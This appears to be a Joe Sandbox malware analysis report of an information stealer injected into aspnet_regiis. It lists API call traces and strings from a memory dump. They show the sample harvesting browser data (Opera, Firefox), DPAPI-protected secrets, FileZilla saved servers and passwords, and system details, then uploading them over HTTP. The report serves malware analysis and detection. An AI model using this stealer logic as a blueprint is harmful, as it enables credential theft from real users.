                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                              • API String ID: 1150833511-4073750446
                                                                                                                                                                              • Opcode ID: f3f91ce316ca85053c3d86a9104f18e7944b7973c3660d8f4aaa4e6a8e91a837
                                                                                                                                                                              • Instruction ID: 29526e89a111a2e1d8a69cdd082fa859881189b36193119c53d174560d223657
                                                                                                                                                                              • Opcode Fuzzy Hash: f3f91ce316ca85053c3d86a9104f18e7944b7973c3660d8f4aaa4e6a8e91a837
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A51FBB1D4022C9BDF60DF64DC88AD9B7BDAB48310F5045E5A609E3240EB31DB95CF65
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,02A3682E,02A0CC6B,?,?), ref: 02A0BFC5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37470), ref: 02A0BFE5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37474), ref: 02A0BFFF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera,02A36843,02A36842,02A36837,02A36836,02A36833,02A36832,02A3682F), ref: 02A0C08B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX), ref: 02A0C099
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 02A0C0A7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                              • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                              • API String ID: 2567437900-1710495004
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02A151C2
                                                                                                                                                                              • _memset.LIBCMT ref: 02A151E5
                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02A151EE
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A1520E
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A15229
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14D1C
                                                                                                                                                                                • Part of subcall function 02A14CC8: FindFirstFileA.KERNEL32(?,?), ref: 02A14D33
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14D4F
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14D60
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A369F8), ref: 02A14D81
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A369FC), ref: 02A14D9B
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14DC2
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A3660F), ref: 02A14DD6
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14DFF
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14E28
                                                                                                                                                                                • Part of subcall function 02A14CC8: lstrcat.KERNEL32(?,?), ref: 02A14E3D
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1524A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A152C4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                              • API String ID: 441469471-147700698
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A37570,02A368A3,?,?,?), ref: 02A0D647
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37574), ref: 02A0D668
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37578), ref: 02A0D682
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,prefs.js,02A3757C,?,02A368AE), ref: 02A0D70E
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0D7E8
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0D8B3
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A0D956
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0D96A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                              • String ID: prefs.js
                                                                                                                                                                              • API String ID: 893096357-3783873740
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A37424,02A36822,?,?,?), ref: 02A0B657
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37428), ref: 02A0B678
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3742C), ref: 02A0B692
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37430,?,02A36823), ref: 02A0B71F
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0B780
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A0ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AC8A
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A0B8EB
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0B8FF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3801961486-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A124B2
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A124D4
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A124E4
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A124F6
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 02A12508
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A12521
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID: steam.exe
                                                                                                                                                                              • API String ID: 1799959500-2826358650
                                                                                                                                                                              • Opcode ID: a97b527bbbf29c8cebefd93357777e65eba9b73a3fbef0a6b4ca914fdf2de7a3
                                                                                                                                                                              • Instruction ID: 1773a9f44fc34aaac05bf3aea6492cef560a17b0bd3ba204b2d7e14d6521c49c
                                                                                                                                                                              • Opcode Fuzzy Hash: a97b527bbbf29c8cebefd93357777e65eba9b73a3fbef0a6b4ca914fdf2de7a3
                                                                                                                                                                              • Instruction Fuzzy Hash: 6A011A709412389FEB619F64CD94BDEB6B8AB09320F4001D5A909E2290EF34CB84CF20
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,02A3670D,?,?), ref: 02A10E0C
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 02A10E1A
                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A10E28
                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A10E57
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02A10EFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                              • String ID: /
                                                                                                                                                                              • API String ID: 507856799-4001269591
                                                                                                                                                                              • Opcode ID: 159fde44a2777427c04c51c1442cdf3419a29c675fe3dc1bc59a970812f5308f
                                                                                                                                                                              • Instruction ID: 241d0d188647d3870a74967d019b5d01e9edbac315effceb6d9f10476f1f95ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 159fde44a2777427c04c51c1442cdf3419a29c675fe3dc1bc59a970812f5308f
                                                                                                                                                                              • Instruction Fuzzy Hash: D63149B5D80228AFDB20AF64DD88B9EB3B9BB04310F5045E5E919B3151DB74AEC58F60
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A12589
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,02A17E31,.exe,02A36CCC,02A36CC8,02A36CC4,02A36CC0,02A36CBC,02A36CB8,02A36CB4,02A36CB0,02A36CAC,02A36CA8,02A36CA4), ref: 02A125A8
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A125B8
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A125CA
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A125DC
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A125F0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1799959500-0
                                                                                                                                                                              • Opcode ID: a00af5c36663d61cd5914654ae8bfa609a81cf075548c3627f4969b3682da7fe
                                                                                                                                                                              • Instruction ID: 1064419eba32fbc9ff569d0298161150087c8315afb5e8fa1ba0b44b74442e0a
                                                                                                                                                                              • Opcode Fuzzy Hash: a00af5c36663d61cd5914654ae8bfa609a81cf075548c3627f4969b3682da7fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E011D319412349FE7219B648D98FEAB6BC9B19351F8405D5E90DE2241EF38CB949B21
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A0823B), ref: 02A080C4
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,02A0823B,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080D8
                                                                                                                                                                              • LocalFree.KERNEL32(02A0CB95,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080FD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                              • String ID: DPAPI
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A36712,?,?), ref: 02A114D4
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A114E4
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A11542
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A1154D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A10D49
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10D50
                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 02A10D5F
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10D7D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,?,?,?,?,02A01503,avghookx.dll,02A18544), ref: 02A014DF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1586166983-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05519
                                                                                                                                                                                • Part of subcall function 02A11E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,02C5E908,?,?,?,02A128A1,?,?,00000000), ref: 02A11E7D
                                                                                                                                                                                • Part of subcall function 02A11E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,02A128A1,?,?,00000000), ref: 02A11E8A
                                                                                                                                                                                • Part of subcall function 02A11E5D: RtlAllocateHeap.NTDLL(00000000), ref: 02A11E91
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36986,02A3697B,02A3697A,02A3696F), ref: 02A05588
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A055AA
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A056C0
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A05704
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05736
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                              • lstrlen.KERNEL32(?,",file_data,02A37850,------,02A37844,?,",02A37838,------,02A3782C,b74ef0d8ce56e494b0d83e1d5be9dbeb,",build_id,02A37814,------), ref: 02A05C67
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05C7A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A05C92
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A05C99
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05CA6
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05CB4
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?), ref: 02A05CC9
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05CD6
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05CE4
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05CF2
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05D05
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05D1A
                                                                                                                                                                              • HttpSendRequestA.WININET(?,?,00000000), ref: 02A05D2D
                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05D6F
                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A05E26
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,block), ref: 02A05E3B
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A05E46
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                              • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b74ef0d8ce56e494b0d83e1d5be9dbeb$block$build_id$file_data
                                                                                                                                                                              • API String ID: 4232923880-4073018579

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A0E77E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,02A36912,02A3690F,02A3690E,02A3690D), ref: 02A0E7C4
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0E7CB
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 02A0E7DF
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E7EA
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 02A0E81E
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E829
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 02A0E857
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E862
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 02A0E890
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E89B
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0E901
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0E915
                                                                                                                                                                              • lstrlen.KERNEL32(02A0ECBC), ref: 02A0EA3D
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
